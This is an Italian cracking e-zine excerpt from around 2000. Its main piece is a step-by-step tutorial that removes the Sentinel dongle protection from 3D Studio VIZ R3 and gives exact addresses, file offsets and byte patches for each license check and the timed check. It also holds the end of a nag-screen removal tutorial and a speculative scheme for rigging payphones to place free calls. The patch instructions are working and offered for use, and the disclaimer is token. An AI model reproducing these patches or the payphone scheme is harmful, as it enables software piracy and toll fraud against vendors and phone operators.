ESP=72FD7C
414AD8 PUSH 00 --> ESP=72FD78
414ADA PUSH 004161D0 --> ESP=72FD74
414ADF PUSH 00 --> ESP=72FD70
414AE1 PUSH 00000226 --> ESP=72FD6C
414AE6 PUSH ESI --> ESP=72FD68
414AE7 Call USER32!DialogBoxParamA --> ESP=72FD7C
ESP=72FD7C

Se noi ci limitassimo a nooppare la call, il puntatore allo stack (ESP)
avrebbe come valore 72FD68 e non quello che dovrebbe avere se la call fosse
stata eseguita (72FD7C) quindi punterebbe a dati inconsistenti e probabilmente
il prog. crashera' dopo qualche operazione sullo stack.
Quindi, per assicurarci che tutto fili liscio, dobbiamo anche nooppare le
varie push dei parametri sullo stack.

Ora sta a voi scegliere come modificare il prog. per non mostrare piu' il nag,
ad esempio potreste fare una modifica del genere (ho scritto le istruzioni
modificate in minuscolo)

CALL 4092A0
ADD ESP, 04
mov eax, 1 <--- per far credere al prog. che si e' pigiato il pulsante
"Trial"
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
CMP EAX,2
JNZ 414AF6

oppure, piu' semplicemente cosi'...

CALL 4092A0
ADD ESP, 04
mov eax, 1
pop esi
jmp 414AF6

Le variazioni sono molteplici, solitamente si sconsiglia di ricorrere ai nop
poiche' il programma potrebbe fare un auto-check per controllare ad
esempio se compaiono sequenze di 3 o piu' nop.
Inoltre e' buona norma cercare di forzare il meno possibile il normale flusso
del programma a meno di non conoscere MOLTO bene il comportamento del
codice che si ha sottomano.

Se ora aprite il file con un editor esadecimale e rendete definitive le
modifiche il nag sara' deltutto scomparso.

-->Note finali<--

Un ringraziamento a tutti coloro che hanno condiviso le loro conoscenze
diffondendo tutes sull'argomento, sono davvero troppi per poterli
nominare, in
ogni caso, se hai mai scritto un tute considerati pure in questa lista,
poiche' ognuno ha qualcosa da insegnare (ed io ho ancora molto da imparare
:-P )
Un saluto a tutti i compagni della UIC in particolare Ritz, GR!SU',
Syscalo,
BlackDruid, AndreaGeddon, continuate cosi' gente !!!
Ed ovviamente non manco di ringraziare tutti i papa' fondatori della UIC.
Il Socio passa e chiude, Ciau alla prossimaaaaaaaaaaa.

Per finire un po' di pubblicita'...

http://quequero.cjb.net <--| Non perdetevi il sito della UIC!!!!
http://ringzer0.goldrake.com/
http://aisprod.cjb.net
http://www.lupin3rd.org
http://crackstore.com
http://valvoline.cjb.net
http://members.xoom.co/daPopesTutor/frame.htm

<->E-mail: Int19@hotmail.com<->
<->ICQ:4044843<->

---Int19 aka Il.Socio---


-=!!!|-3D Studio VIZ R3-|!!!=-
--[ Dongle up your ass ]--


[ 24-03-2000 ]

Autore: Quequero


Ah Gigè, MA QUANTE KAZZO NE VUOI SAPE' OOOOOOOO
...che fatica commentarsi i tutorial :), ad ogni modo avete davanti il
primo tutorial della UIC sul cracking di un target che usa un dongle.....
Può essere interessante :)


UIC's form Home page se presente: http://quequero.cjb.net

E-mail: UIC@mail.usa.com

#Crack-it #UIC UIC's form

Difficoltà
( )NewBies (X)Intermedio (X)Avanzato ( )Master


Volevate un tutorial sui dongle? Beh, eccone uno fresco fresco :).

[---------------------]

La versione a colori (.html) e' allegata all'e-zine.



Introduzione


Ragazzi, sono stato assente molto tempo per motivi in realtà stupidi, ma in
questo momento di "idle"

  
ho deciso di attaccare una protezione che mi
"chiamava" oramai da molto tempo......La release che attaccheremo sarà
l'ultima della Kinetix (già, proprio quelli del 3D Studio Max) e cercheremo
di abbattere la protezione rappresentata dal dongle stesso.

Tools usati

IDA 3.x
SoftIce 4.x (ma qualunque versione va bene)
URL o FTP del programma

http://vizonline.autodesk.com/ qui troverete aiuto, il programma lo potete
trovare sui cd dei giornali oppure ve ne fate prestare uno originale o
copiato e lo crackate

Notizie sul programma

Il 3D Studio è un programma che è fantastico......O almeno, suppongo che sia
fantastico visto che non lo so usare tanto bene :)..Ad ogni modo è
conosciutissimo perchè è lo stesso che hanno usato per creare i mostri di
Hercules, gli effetti di Matrix, Quake3, Jurassic Park; il programma serve
per l'animazione e la modellazione 3D, se siete abbastanza bravi potete anche
cimentarvi in imprese tipo la relizzazione di immagini digitali (e devo dire
da quello che ho visto in giro che se lo sapete usare potete farci venir
fuori qualunque cosa con un grado altissimo di realtà).....Insomma, il
programma sembra proprio valere tanto oro quanto pesa ed è un po' il
"SoftIce" dei grafici tanto per capirci.

Essay

Installate tutto il programmuzzo, riavviate e preparatevi spiritualmente a
questo nostro piccolissimo attacco :)....All'avvio farà la sua comparsa un
bel logo e quindi un simpatico box recante la scritta:

Hardware lock is not attached, or you are using the wrong lock, or the lock
device drivers are not running.

Decisamente molto simpatico.....La chiave hardware non è attaccata (ma va?)...

Oppure stai usando la chiave sbagliata (se, come se a casa avessi dongle a
iosa), oppure il dispositivo della chiave non sta correndo (eppure è strano,
sono stato a rincorrere la parallela per dieci minuti.........Bhoooooooo)....

Bene gente di mala fede :)....Suggerisco di iniziare a mettere un breakpoint
su MessageBoxA (già, da questo lato è più semplice crackare la protezione
piuttosto che usare il solito bpio -h 378 rw). Prima di procedere di nuovo al
riavvio del programma vi consiglio VIVAMENTE di farvi una copia di backup
dell'eseguibile (3dsviz.exe) e di farla disassemblare dalla cara IDA, segnate
la casella "Load Resources" al momento del disasm, ma non scappate perchè
dopo qualche secondo vi chiederà di cercare per lei due dll
(splash.dll e zlib.dll) che si troveranno nella cartella del 3D Studio, fatto
questo spegnete winamp, chiudete tutto quello che avete nel systray,
overclockate il processore e andate a farvi un giro......Dopo circa 15 minuti
troverete un bel file tutto disassemblato, incasinato quanto l'intestino di
un bue mutante.

A questo punto riattivare il breakpoint del messagebox......Avviate 3D Studio
e fatevi un giro per quelle routine...Bene, uscite dalla chiamata in cui vi
trovate e felicemente settate un breakpoint sulla chiamata alla routine che
genera il box (0048A783 tanto per capirci), adesso fate ripartire il programma
ed entrate in questa call, troverete subito qualcosa di simile:

.text:0048A7A3 sub esp, 200h
.text:0048A7A9 mov eax, _data_648D34
.text:0048A7AE test eax, eax
.text:0048A7B0 jz short _text_48A7C3

c'è un test eax, eax...Non cambiatelo perchè mettendo in eax un valore diverso
da zero entrerete in questa routine:

text:0041AE00 mov eax, _data_648D34
text:0041AE05 mov eax, [eax]
text:0041AE07 retn

come vedete la chiamata muove in eax il valore della locazione 648D34 (che è
zero)...E poi muove in eax ciò che essa stessa punta...Ciò significa che se
voi mettete nel registro un numero qualunque, allora il programma arrivato
alla locazione 0041AE05 muoverò in eax ciò che.......Eax punta, cioè nulla e
quindi....CRASH!

Quindi continuate la vostra esplorazione del codice e tenete particolarmente
d'occhio tulle le XREF che incontrate. Infatti da ora in poi dovremo lavorare
a ritroso per giungere alla parte di codice che ci interessa, (in realtà le
parti che ci interessano sono molte, ma facciamo una cosa alla volta)
suggerisco di iniziare a rintracciare la call che chiama la routine che
genera il box, è necessario risalire per capire dove si possa trovare qualche
check, ed è uno dei pochi metodi attuabili viste le dimensioni ragguardevoli
del file :).
Iniziate a rinominare tutte le routine delle quali conosciamo la funzione e
stiamo particolarmente attenti alla chiamata sulla quale abbiamo settato
l'ultimo breakpoint:

.text:0048A783 _text_48A783: ; CODE XREF: _text_48A6C0+4Dj
.text:0048A783 call NoHardwareKey ; Questa è la routine della
messagebox

Bene, vediamo una reference all'indirizzo 48A6C0...

Clickiamoci sopra e vediamo cosa fa questa chiamata (o se preferite, premete
G e scrivete in IDA 48A6C0)....Approderete qui:

.text:0048A6DF test eax, eax
.text:0048A6E1 mov esi, 4
.text:0048A6E6 jz short _text_48A6F5
.text:0048A6E8 cmp dword ptr [eax+4D4h], 1
.text:0048A6EF jz _text_48A798
.text:0048A6F5 push 404h
.text:0048A6FA lea eax, [ebp+var_404]
.text:0048A700 push eax
.text:0048A701 call _text_5F91C0
.text:0048A706 test ax, ax
.text:0048A709 jz short _text_48A70F
.text:0048A70B push 5
.text:0048A70D jmp short _text_48A783

Okkei, date un'occhiata a tutte le variabili che vedete e poi allegramente
entrate nella routine chiamata all'RVA 0048A701 siete dentro?

Okkei, siamo molto vicini ad un check che esamineremo dopo, per ora non vi
dico nulla visto che a noi interessa capire la protezione, non ci frega nulla
di sapere la locazione dei check se poi non sappiamo da dove vengono, giusto?


[------ Piccolo trucchetto del mestiere ------]

Vi consiglio trovare le call che cercano di accedere al dongle......Ma come?
Beh, o andate giu di breakpoint oppute fate come ho fatto io (grazie Zafer,
il trucchetto è suo, io non ci avrei mai pensato) cioè, togliete la parallela
dalla stampante e ne prendete la spina che dovrebbe essere attaccata alla
stampante.....

La guardate e cercate il primo pin (in genere ci sono dei numeri, ma vista
frontalmente è il primo pin in alto a sinistra).......

Bene, adesso ci dovete collegare un led (non siate tirchi che costano 100£
l'uno)......

Già, proprio un led (e qua l'intentiva è stata tutta mia :) guardate il Led,
il gambo più lungo è il catodo (dove deve arrivare tensione con segno -) e
l'altro è l'anodo (tensione positiva) inserite il gambo dell'anodo nel
secondo pin della parallela e mettete a contatto il catodo del Led con la
massa della porta (la parte in metallo) se avete fatto tutto bene avete
create un utilissimo congegno che vi svelerà ogni volta che un programma
cerca di accedere alla parallela...Come? Ovvio, il led si accende e mentre
steppate potete capire con facilità se state chattando col dongle o meno :)...

È facilissimo in realtà, e con 2000£ vi fate un congegnetto che credetemi
userete anche in futuro :).

[------ Fine trucchetto del mestiere ------]

Bene, bene, abbiamo visto queste simpatiche routine, ora cerchiamo di brekkare
su qualche check, per prima cosa collegate il vostro nuovo attrezzo alla
parallela :), avviate 3D Studio........

Notate che dopo circa 2 secondo il led lampeggia, bene, riavviate 3D Studio e
prima che il led si accenda provate a premere ctrl+d e steppate fino ad
arrivare all'RVA 005F9E65 (il metodo usato è molto empirico ma funziona
benissimo), ora entrate in questa chiamata e steppate con F10 fino a 004021C7,
entrate qua dentro e steppate ancora fino a 0048A701, entrateci, e vi
ritroverete qua:

.text:005F91C0 push esi
.text:005F91C1 push edi
.text:005F91C2 mov eax, [esp+arg_0]
.text:005F91C6 or eax, eax
.text:005F91C8 jnz short _text_5F91D3
.text:005F91CA mov ax, 2
.text:005F91CE pop edi
.text:005F91CF pop esi
.text:005F91D0 retn 8

Mmmmmmmm........Un po' di zen adesso.......Soffermiamoci sulla call a
0048A701 e cosa vediamo?

.text:0048A6FA lea eax, [ebp+var_404]
.text:0048A700 push eax
.text:0048A701 call _text_5F91C0
.text:0048A706 test ax, ax
.text:0048A709 jz short _text_48A70F
.text:0048A70B push 5
.text:0048A70D jmp short _text_48A783
.text:0048A70F lea ecx, [ebp+var_404]
.text:0048A715 push ecx
.text:0048A716 call _text_5F9220
.text:0048A71B test ax, ax
.text:0048A71E jz short _text_48A724
.text:0048A720 push 5
.text:0048A722 jmp short _text_48A783

vediamo che c'è una chiamata e poi un test ax, ax (e di fatti nella chiamata
48A701 ci siamo entrati dentro.......Ma poco dopo troviamo una chiamata
simile (cioè: call, e poi test ax, ax).......

Possiamo supporre che la prima call sia un check (Non è che lo facciamo ad
cazzum, anche perchè andando a ritroso nel codice giungiamo alla routine che
ci chiude il programma :)..E quindi anche la seconda, perciò esaminiamole
tutte e due, iniziamo con quella all'RVA 0048A701 (che chiameremo PrimoCheck):

.text:005F91C0 push esi
.text:005F91C1 push edi
.text:005F91C2 mov eax, [esp+arg_0]
.text:005F91C6 or eax, eax ; EAX=0? Non saltare
.text:005F91C8 jnz short _text_5F91D3
.text:005F91CA mov ax, 2
.text:005F91CE pop edi
.text:005F91CF pop esi
.text:005F91D0 retn 8

può essere interessante........Vi riporto lo stato dei registri appena entrati
in questa chiamata:

EAX=0096F8FC EBX=00400000 ECX=00000000 EDX=11000810 ESI=00000004
EDI=0096FD00 EBP=0096FD00 ESP=0096F8E0

che chiamata "innocua"...Dhe hi hi, allora cosa succede qua dentro? Vengono
salvati esi ed edi, in eax viene mosso 0096F8FC.....Poi viene testato EAX, se
è 0 allora muove 2 in AX.......Passiamo all'altra chiamata:

.text:005F9220 sub esp, 4
.text:005F9223 push esi
.text:005F9224 push edi
.text:005F9225 mov edi, [esp+0Ch+arg_0]
.text:005F9229 or edi, edi
.text:005F922B jnz short _text_5F9239
.text:005F922D mov ax, 2
.text:005F9231 pop edi
.text:005F9232 pop esi
.text:005F9233 add esp, 4
.text:005F9236 retn 4

Succede lo stesso solo che stavolta viene testato edi......Allora a runtime
facciamo una cosa, alla prima chiamata azzeriamo eax, e poi dopo "mov ax, 2"
lo azzeriamo di nuovo e quindi steppiamo.....Alla seconda facciamo in modo
che il salto a 005F922B NON avvenga e quindi azzeriamo EAX prima del "retn 4"

Chiudiamo sice.........Niente, stesso messaggio, proviamo a cercare un altro
check, rientriamo....Facciamo le stesse modifiche e steppiamo ancora...Sempre
utilizzando un pochetto di zen andiamo qualche rigo più giù ed entriamo alla
chiamata che si trova all'RVA 0048A35A, ecco cosa troviamo:

.text:005F9400 push ebx
.text:005F9401 push esi
.text:005F9402 mov eax, [esp+arg_0]
.text:005F9406 or eax, eax
.text:005F9408 jnz short _text_5F9413
.text:005F940A mov ax, 2
.text:005F940E pop esi
.text:005F940F pop ebx
.text:005F9410 retn 8

mmmmmm non mi sembra affatto nuovo, stessa cosa di prima, facciamo in modo
che eax in uscita contenga zero....Tadàààà funziona...Deh hi hi :).......

Bene, abbiamo crackato il programma??? Beati voi che credete ancora nelle
favole :)....Innanzitutto apportiamo una piccola modifica al programma,
trasformando in questo modo le routine:

Primo check:
.text:005F91C0 push esi
.text:005F91C1 push edi
.text:005F91C2 mov eax, [esp+arg_0]
.text:005F91C6 33C0 xor eax, eax
.text:005F91C8 jnz short _text_5F91D3
.text:005F91CA 33C0 xor eax, eax
.text:005F91CC 90 nop
.text:005F91CD 90 nop
.text:005F91CE pop edi
.text:005F91CF pop esi
.text:005F91D0 retn 8

Secondo check:
.text:005F9220 sub esp, 4
.text:005F9223 push esi
.text:005F9224 push edi
.text:005F9225 mov edi, [esp+0Ch+arg_0]
.text:005F9229 33FF xor edi, edi
.text:005F922B jnz short _text_5F9239
.text:005F922D 33C0 xor eax, eax
.text:005F922F 90 nop
.text:005F9230 90 nop
.text:005F9231 pop edi
.text:005F9232 pop esi
.text:005F9233 add esp, 4
.text:005F9236 retn 4

Terzo check:
.text:005F9400 push ebx
.text:005F9401 push esi
.text:005F9402 mov eax, [esp+arg_0]
.text:005F9406 33C0 xor eax, eax
.text:005F9408 jnz short _text_5F9413
.text:005F940A 33C0 xor eax, eax
.text:005F940C 90 nop
.text:005F940D 90 nop
.text:005F940E pop esi
.text:005F940F pop ebx
.text:005F9410 retn 8

(se il patch non dovesse andare, sostituite i nop con "inc eax dec eax" o
più semplicemente appena entrati nella chiamata sostituite tutti e tre i
check con un bel "xor eax, eax retn x")

Adesso il programma sembra funzionare correttamente.........Gia, sembra....
Perchè? Beh perchè c'è sicuramente ALMENO un altro check.......Che è
semplicissimo da scoprire, basta aprire 3D Studio e lasciarlo lì per 5 minuti.

Poi un bel box ci accoglierà dicendoci che non c'è nessuna chiave......
Bene andiamo a distruggere anche quel check :)
Lo Zen ancora una volta ci da una mano :)......(Ah! Io ho scoperto il check
mentre giocherellavo col 3D Studio, poi ho riaperto il programma ed ho
misurato il tempo col cronometro....Erano 5 minuti e qualcosa, ma visto che i
programmatori sono spesso idioti sapevo per certo che quel check era
impostato a 5 minuti esatti :) un check di quel genere quasi sicuramente sarà
settato con un bel SetTimer:

UINT SetTimer(

HWND hWnd, // handle of window for timer messages
UINT nIDEvent, // timer identifier
UINT uElapse, // time-out value
TIMERPROC lpTimerFunc // address of timer procedure
);

allora, per chi non lo sapesse, il parametro da cercare non è il 3°, bensì il
secondo perchè il sistema salva i dati nello stack al contrario....

Breve digressione:

molti di voi si chiedono perchè i dati vengono salvati al contrario, e se
scrivete in ASM sapete anche che non potete chiamare un api come fareste in C,
cioè chiamando i parametri dal primo all'ultimo, ma dove pushare al contratio
tutti i parametri oppure dovete usare la notazione in riga. Perchè tutto
questo? Lo stack funziona con un metodo detto LIFO (Last In First Out) cioè,
è come quando accatastate tante monetine, se poi dovete recuperarle senza
farle cadere sarete costretti a tirarle via a partire della più alta (che è
quella che avete messo lì per ultima), quindi lo stack fa la stessa cosa,
prendendo in esempio l'API SetTimer vediamo che il sistema deve recuperare
per primo il primo parametro e per ultimo il quarto parametro, ma visto che
lo stack si muove in maniera ambigua (LIFO) se noi facessimo pushare i
parametri in questo ordine:

1
2
3
4

quando il processore andrà a popparli tirerebbe li tirerebbe fuori in ordine
inverso:

4
3
2
1

se invece noi li pushiamo al contrario (cosa che viene fatta automaticamente
nei linguaggi ad alto livello, ma la dobbiamo fare manualmente se scriviamo
in ASM) allora il processore li popperà nel giusto ordine, guardate:

PUSH:

4
3
2
1

POP:

1
2
3
4

è questo il motivo per il quale in sice dobbiamo andare a cercare il secondo
parametro e non il quarto.

Fine digressione.

Sappiamo che il check viene fatto dopo 5 minuti e sappiamo anche che SetTimer
vuole che gli sia passato il tempo in millisecondi, quindi:

1000 millisecondi = 1 Secondo
1 minuto = 60 secondi cioè = 60*1000 = 60.000 millisecondi
5 minuti = 60.000*5 = 300.000

300.000 in esadecimale corrisponde a 493E0h
allora, mettiamo un breakpoint su SetTimer ed avviamo 3D Studio, appena
troviamo il Timer giusto ci settiamo un bp sopra........

Oki, la chiamata inizia all'indirizzo 00402546, cambiate il secondo parametro
in modo da attendere solo qualche millisecondo e vedete che viene fuori:

Box1: Hardware lock or its driver is not functioning
Box2: Hardware lock failure -- program must terminate

abbiamo quindi due reference sulle quali attaccarci per risalire al codice,
quindi mettiamo un bp su messagebox e vediamo dove tornano queste due chiamate
che li generano:

0048A622 e 0048A6A4

andiamo in IDA e vediamo cosa troviamo da queste parti:

.text:0048A60F push 2010h
.text:0048A614 lea eax, [ebp+var_270]
.text:0048A61A push eax
.text:0048A61B lea ecx, [ebp+var_170]
.text:0048A621 push ecx
.text:0048A622 push 0
.text:0048A624 call ds:MessageBoxA
.text:0048A62A _text_48A62A: ; CODE XREF: CheckCall+377j
.text:0048A62A ; CheckCall+386j

ora vi starete chiedendo: "Chi è CheckCall?"....Quella non è altro che la
chiamata che contiene tutti quanti i check cioè quella che si trova
all'RVA 0048A240, clickate sulla XREF e dove finite?

.text:0048A5A3 push esi
.text:0048A5A4 push 1Ch
.text:0048A5A6 lea eax, [ebp+var_674]
.text:0048A5AC push eax
.text:0048A5AD call QuartoCheck
.text:0048A5B2 and eax, 0FFFFh
.text:0048A5B7 jz short Box1
.text:0048A5B9 mov ecx, [ebp+var_4]

Esattamente dopo il quarto check (che polli i programmatori) quindi andando
per esclusione anche la chiamata a 0048A5AD DEVE essere un check,
esploriamola:

.text:005F99C0 push ebx
.text:005F99C1 push esi
.text:005F99C2 push edi
.text:005F99C3 mov eax, [esp+arg_0]
.text:005F99C7 or eax, eax
.text:005F99C9 jnz short _text_5F99D5
.text:005F99CB mov ax, 2
.text:005F99CF pop edi
.text:005F99D0 pop esi
.text:005F99D1 pop ebx
.text:005F99D2 retn 18h

Mmmmmmm non sembra essere troppo diverso da prima.......Ed invece lo è.......
E molto, non vi nascondo che questo check mi ha dato dei piccoli problemi per
via della sua strana conformazione :)....Allora, se facciamo la solita
modifica (cioè muoviamo in eax 0) poi incappiamo in un secondo sub-check, e
cmq il check viene fatto due volte, quindi vi propongo ben tre soluzioni
attuabili:

1) Modifichiamo la chiamata affinche xori eax e poi all'RVA 0048A5B2 invece
di "and eax...." facciamo saltare al programma tutti quanti gli altri
check, ciò significa che dobbiamo mettere un "jmp 48A63D" (solo che
dovremmo inserire un jmp di questo tipo dopo ogni chiamata a questa routine
e le chiamate ne sono diverse)

2) Modifichiamo la chiamata nel solito modo ed invece di mettere il jump ci
calcoliamo quanti byte intercorrono dall'istruzione dopo della call fino
alla fine dei check: 0048A63D-0048A5B2 = 8Bh, quindi aggiungiamo allo
stack pointer 8Bh appena prima del ret così la chiamata tornerà proprio
all'istruzione 0048A63D

3) Noppiamo tutta la routine che setta il timer così che non sarà fatto alcun
check ogni 5 minuti e ci leviamo tutti gli inutili problemi di torno :)

Io ho scelto l'ultima, quindi se volete, aprite il file con un hex editor
(RVA 402546 offset 2549h) e noppate tutta la routine dall'offset 2549h
all'offset 255Bh.

Visto che scrivo i tutorial a runtime ho appena testato e sembra funzionare
correttamente, se non dovesse andare ci sarebbero comunque altre due soluzioni
:).

Finito? NO!

Mentre guardavo il listato mi sono accorto di un "probabile" 5° Check (offset
1F95D0), stavo guardando le varie routine ed ho scoperto che ce n'era una
uguale agli altri check, eccovela:

.text:005F95D0 push esi
.text:005F95D1 push edi
.text:005F95D2 mov eax, [esp+arg_0]
.text:005F95D6 or eax, eax
.text:005F95D8 jnz short _text_5F95E3
.text:005F95DA mov ax, 2
.text:005F95DE pop edi
.text:005F95DF pop esi
.text:005F95E0 retn 0Ch

.text:005F95E3 push eax
.text:005F95E4 call _text_5F33E0
.text:005F95E9 mov esi, eax
.text:005F95EB cmp word ptr [esi], 72
.text:005F95F0 jz short _text_5F9600
.text:005F95F2 mov ax, 2
.text:005F95F6 pop edi
.text:005F95F7 pop esi
.text:005F95F8 retn 0Ch

è decisamente un check, ma non sono riuscito ad arrivare a questa routine in
quanto non ho potuto clickare tutti i maledetti menu del 3D Studio, tutto
inizia comunque da una call all'RVA 00464DB0, solo che questa call
stranamente non ha reference all'esterno, tranne una nella sezione .rdata:

; DATA XREF: .rdata:0060B0C4o ---->

.rdata:0060B0C4 dd offset _text_464DB0

E la cosa non mi piace per niente...Mumble mumble...Forse forse sono arrivato
ad una qualche conclusione...Dunque, proviamo a fare una cosa......
Forziamo il jnz a 00F95D8 e facciamolo diventare un jmp che punterà
all'RVA 005F95F6, quindi cambiamo quei "pop edi" e "pop esi" in xor eax,
eax.......Dovrebbe andare....Olè, raga, mentre facevo un disegno so riuscito
ad arrivare a questa routine e sembra proprio che non questa modifica vada
bene, quindi ecco cosa dovrete fare:

.text:005F95D0 push esi
.text:005F95D1 push edi
.text:005F95D2 mov eax, [esp+arg_0]
.text:005F95D6 or eax, eax
.text:005F95D8 E919000000 jmp 0001F95F6

---- snip ------ snip ------ snip ------ snip ------

.text:005F95F6 33C0 xor eax,eax
.text:005F95F8 retn 0Ch

Benissimo, possiamo considerare ora il 3D Studio crackato e funzionante al
100%....Altri check non ce ne sono, questo è poco ma sicuro, vorrei comunque
farvi notare una cosa, cioè che prima di ogni check trovate questa istruzione:


.text:0048A5A6 lea eax, [ebp+var_674]

io purtroppo me ne sono accorto solo ora, ma cmq visto che l'ho scoperto ho
potuto controllare che non ci fossero altri check presenti.......E non ce ne
sono :)

Conclusione:

stavolta abbiamo crackato un programma che utilizzava un dongle Sentinel
senza avere il dongle originale, siamo anche stati fortunati perchè quello
che c'era da capire per eludere i check non è stato eccessivamente difficile,
ma potrebbe capitarci un programma crittato nel quale dongle risiede l'algo
di decrittazione.......A quel punto NON possiamo fare nulla senza il dongle
originale......Ma se riuscissimo a procurarcelo potremmo creare un emulatore.
...Credo quindi che appena avrò a disposizione un dongle originale ed un
programma che utilizzerà questa tecnica, ne farò sicuramente un tutorial.

Note finali

Ringrazio tutti quanti i membri della UIC dal primo all'ultimo, ringrazio in
particolar modo:

Master degli SPP: per la sua disponibilità sempre immensa, e per la sua
voglia di insegnare ai lamer come me tutte quelle cose strabelle che lui solo
conosce :)

Rigor Mortem degli SPP: anche lui per essere una persona incredibilmente
disponibile e per tantissimi altri motivi

+Xoanon: che sti giorni sembra essere una persona seria, fiduciosa....Sarà
forse per il ritorno di Anninaaaaaaaaaaaa??? :)

Ghibly: perchè è l'unica donna che riesce a gestire decine di bot senza
sapere un tubo di unix-linux e related :)

Olga: che ultimamente è morta ma che resta il miglior revrser donna al mondo..
E forse l'unica in grado di tener testa al più grande reverser di tutti tempi.

cioè Killexx......Che anche se non lo sento da millenni continuerò a stimare
per sempre, sei grande kill.

Ringrazio in fine tutta quanta la crew degli SPP per avermi letteralmente
REGALATO un dominio di primo livello con tanto di hosting......Grazie SPP.

E visto che per una volta non vado di fretta saluto:

Andrea M. (anche se un giorno per colpa mia qualcuno ti licenzierà :), cod,
AndreaGeddon, Ritz, nu, cek, syscalo, [alt255], ja lai, Annalisa, Romano M.
(sei un grande), Marco C. e Claudio R. (grazie moltissime), Il_Bieco, Spinone,
Along3x, Alor e tutti gli altri che quando dei fare i ringraziamenti non ti
vengono mai in mente :)......Ciauzzzzzzzzzzzzz

-->Un Fuck:<--

Al palermitano maledetto (non che abbia nulla contro i palermitani sia inteso)
che telefona alla mia pupa....Ma che vuoiiiiiii sei un vecchio.....Pensa alle
vecchie e lascia la mia piccola (si fa per dire) 'cesca..........Fuck fuck
fuck e strafuck.....Non puoi fare qualche altro numero ad cazzum? Col culo
che ti ritrovi magari becchi quello di Anna Falchi che ti assicuro è meglio
della mia pupa..........Fuckkkkkkkkkkkkkkkkkkkkkkkk

[------ Addendum 07-04-2000 ------]

Salve a tutti.......Dovrei fare delle correzioni al tutorial visto che
Xoanon mi ha seriamente minacciato :)))))
Ho sbagliato a scrivere quelle cose sul suo conto.......Xoanon è sempre stata
una persona seria (ermmm...) e sempre fiduciosissima nei confronti di noi
leim :).....L'Annina con cui sta è nuova, e per chi lo avesse pensato non
è quella di prima dal momento che quella sta col metalmeccanico e non
c'entra niente :) e con questa mancanza mi sono precluso l'invito al suo
matrimonio. :)

Oltretutto ho commesso un errore a dir poco madornale dicendo che Kill3xx
fosse il più grande reverser del mondo....Non è vero, mi sono sbagliato,
avevo invertito il suo nome con quello di Xoa....È lui infatti il più grande
reverser del mondo....

Eccovi una sua frase:

Qui si revisa il reato di bestemmia, pubblica ingiuria e sostituzione
di persona. Il più grande reverser di tutti i tempi son io. Ti
diffido dal riavvicinare il mio nome a cotal leim.

Anzi no, non minimizziamo, di tutto l'universo conosciuto e sconosciuto
Non c'è (e non ci sarà mai) reverser più grande di lui.......È unico ed
inimitabile, oltre che onnipotente ed imperituro :)...E con questo credo di 3
aver finito, ciauzzzzzzz.....Ermmm xoa, adesso me la puoi togliere la pistola
da dietro la schiena! :)

[------ Fine Addendum ------]

-->Disclaimer<---


Vorrei ricordare che il software va comprato e non rubato, dovete registrare
il vostro prodotto dopo il periodo di valutazione. Non mi ritengo responsabile
per eventuali danni causati al vostro computer determinati dall'uso improprio
di questo tutorial. Questo documento è stato scritto per invogliare il
consumatore a registrare legalmente i propri programmi, e non a fargli fare
uso dei tantissimi file crack presenti in rete, infatti tale documento aiuta
a comprendere lo sforzo immane che ogni singolo programmatore ha dovuto portare
avanti per fornire ai rispettivi consumatori i migliori prodotti possibili.
Noi reversiamo al solo scopo informativo e di miglioramento del linguaggio
Assembly.
Capitoooooooo????? Bhè credo di si ;))))

---QueQuero---


#####################################################################
####### PPPP H H RRRR EEEEE AAA K KK III N N GGGG #######
####### P P H H R R E A A K K III NN N G #######
####### PPPP HHHHH RRRR EEE AAAAA KK III N N N G GG #######
####### P H H R R E A A K K III N NN G G #######
####### P H H R RR EEEEE A A K KK III N N GGGG #######
#####################################################################

-=!!!|-Pr0gEtt0 pSc-|!!!=-

Autore: DieseL

Visto che sono in molti a chiedermi dettagli sulla mia "idea" ho deciso di
scrivere questo file battezzando il progetto (sempre se qualcuno e' cosi'
disperato da seguirmi ) "Progetto simulazione coins" ovvero "Psc" ( sembra la
sigla del "Partito dei Socialisti Cattolici" [ io sono completamente estraneo
alla politica Italiana, se esiste che nessuno si offenda]).

Ora passiamo alle cose serie.

Fino ad ora tutto quello che scrivero' e' puramente teorico e basato su mie
intuizioni. Sono sicuro che tutti conoscono i coin-up da bar.
Non sono sicuro che tutti sanno come funzionano, ma chi ne conosce il
funzionamento sa che se se ne trova uno con lo sportello aperto è possibile
simulare l'inserimento del gettone semplicemente premendo una molletta.
Perché la molletta fa credere alla macchina da bar che è stata inserita una
moneta? Semplice, perche' quando viene inserito un gettone, prima di scendere
nella "cassaforte", questo schiaccia la molletta.
Pero' prima di schiacciare la molletta la moneta viene esaminata, pesata e bla
bla bla. Questo non ci interessa, a noi importa che la molletta ha questo
gravoso incarico, cioe' informare che e' stata inserita una moneta.
Ma la molla come svolge il suo lavoro?
Ahime', niente di eccezionale è solo un "pulsante", cioe' un interruttore
elettrico.
Ora vi state chiedendo "Ma che ca... c'entra con le telefonate a gratis?", e
anche se non ve lo chiedete io ve lo dico lo stesso.
Be, chissa' se anche le cabine del telefono funzionano cosi'?( Secondo me e'
possibilissimo )
Inoltre sulle monete non ci sono numeri di serie ( fino ad ora ) che la rete
intelligente telecom puo' trattare.
Quindi se il sistema e' questo, basterebbe aggiungere un interruttore che
bypassi il precedente.
Pero' mi e' stato obiettato da Blum che sarebbe necessario bucare il rotor per
piazzare l'interruttore. Ma se invece di usare un interruttore normale usassi
un interruttore comandato a distanza il problema non si pone piu'.
Quindi ricapitoliamo:

*Io inserisco una moneta.
*La cabina esamina la moneta.
*In base all'esame della moneta, essa cade in diversi condotti.
*Alcuni condotti portano alla "camera d'attesa", una sola porta allo
sportellino di ritiro moneta.
*Prima di arrivare alla "camera d'attesa", la moneta schiaccia solo una di una
serie di mollette.
*L'importo viene visualizzato sul display.

Alla fine della conversazione le monete consumato scendono nella cassaforte e
il resto se permettete me lo porto a casa.



******
******** /_____ Monetina
******** \
******

___________
| |
| | |
| \|/ |
| |
__________| |
|\ |
| \ m |
Cavi di controllo | \ o |
| \ l |
| / l |
__________| / a |
| |
| |
| |
| |
|___________|








******
******** /_____ Monetina
******** \
******

___________
| |
| | |
| \|/ |
| |
__________| |
__|___ |\ |
| int. | | \ m |
Cavi di controllo | | | \ o |
| sec. | | \ l |
|______| | / l |
____|_____| / a |
| |
| |
| |
| |
|___________|


L'interruttore secondario ( fino ad ora ) non e' altro che un semplice
transistor che funge da rele', innescato dalla "corrente indotta" indotta in
una bobina.( psc1.gif )
